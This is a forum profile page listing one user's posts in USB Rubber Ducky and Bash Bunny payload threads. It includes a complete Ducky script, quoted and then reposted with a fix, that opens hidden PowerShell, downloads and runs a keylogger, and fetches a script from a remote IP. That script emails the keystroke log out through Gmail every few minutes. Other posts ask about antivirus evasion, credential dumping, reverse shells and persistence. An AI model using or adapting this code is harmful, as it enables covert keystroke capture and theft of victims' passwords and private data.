henna3
-
Posts
10 -
Joined
-
Last visited
Posts posted by henna3
-
-
19 hours ago, Shonenx333 said:
I dont't see any reason why it couldn't. You just need a for example powershell reverse https payload which will then be started insted of the maliciousfile.exe.
I might make a payload tomorrow or so, but feel free to experiment :)
Cant wait!
-
1 hour ago, qdba said:
Good stuff.
Did some changes to your script like
- Minimize Powershell windows
- Dump WiFi creds
- Clear Run Historyhttps://github.com/qdba/bashbunny-payloads/blob/master/payloads/BrowserCreds/payload.txt
You have one for the usb rubber ducky aswell?
Hehe
-
21 hours ago, Mike Jamieson said:
First off I want to thank you for providing educational content to the community. I purchased the USB runner ducky mainly so I can use a keylogger script on it. Unfortunately, I still can't get it to work. I uploaded the mail.ps1 to my server in the public FTP directory, is that the correct directory? See Below the IP address of my server which i changed for security purposes, but is the same IP number format url. Finally I encoded the ducky script using ducky decoder and uploaded the inject.bin file to usb flash drive then put the microSB into the duck. I'm really stuck as to what I'm doing wrong here. Below is the mail.ps1 file I'm using as well which obviously I changed myemail to my actual email@gmail.com with password.
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle hidden
ENTER
DELAY 1500
STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
ENTER
DELAY 400
STRING Get-Keystrokes -LogPath $env:temp\key.txt
ENTER
DELAY 200
GUI r
DELAY 300
STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://101.131.71.81/mail.ps1')
ENTER$SMTPServer = 'smtp.gmail.com'
$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
$SMTPInfo.EnableSsl = $true
$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('myemail', 'mypassword')
$ReportEmail = New-Object System.Net.Mail.MailMessage
$ReportEmail.From = 'myemail'
$ReportEmail.To.Add('myemail')
$ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName
while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360}Any insight would be GREATLY appreciated.
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle hidden
ENTER
DELAY 1500
STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
ENTER
DELAY 400
STRING Get-Keystrokes -LogPath $env:temp\key.log
ENTER
DELAY 200
GUI r
DELAY 300
STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://101.131.71.81/mail.ps1')
ENTER$SMTPServer = 'smtp.gmail.com'
$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
$SMTPInfo.EnableSsl = $true
$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('myemail', 'mypassword')
$ReportEmail = New-Object System.Net.Mail.MailMessage
$ReportEmail.From = 'myemail'
$ReportEmail.To.Add('myemail')
$ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName
while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.log");$SMTPInfo.Send($ReportEmail);sleep 360}I have absolutely no idea if this will fix the problem for you, but it worked for me. Simply changed the key.txt to key.log
Hope it works for you too!
-
Everything works except the persistence. Cant get that to work for some reason.. Do you know how to fix this?
Nice script though chaz!!
-
How are you making this undetected by AV´s ?
-
Nice script man!, quick question
Do you know if there is any way to convert a custom exe ( of your choice ) to a shellcode script?
Thanks!
-
I have a quick little problem. The code and everything runs perfectly fine. My problem is that when the uac prompt comes up, it comes up as an non-active window. So, when alt+y is being pressed its not being pressed in the uac prompt window. Is there any way to fix this issue/workaround?
Amazing twin duck payload!
Thanks.
[Payload Idea] Windows Task as System
in Classic USB Rubber Ducky
Posted · Edited by henna3
For some reason the file wont start at startup. I have tested with notepad.exe and another native exe file. Is there a reason for this?
Thanks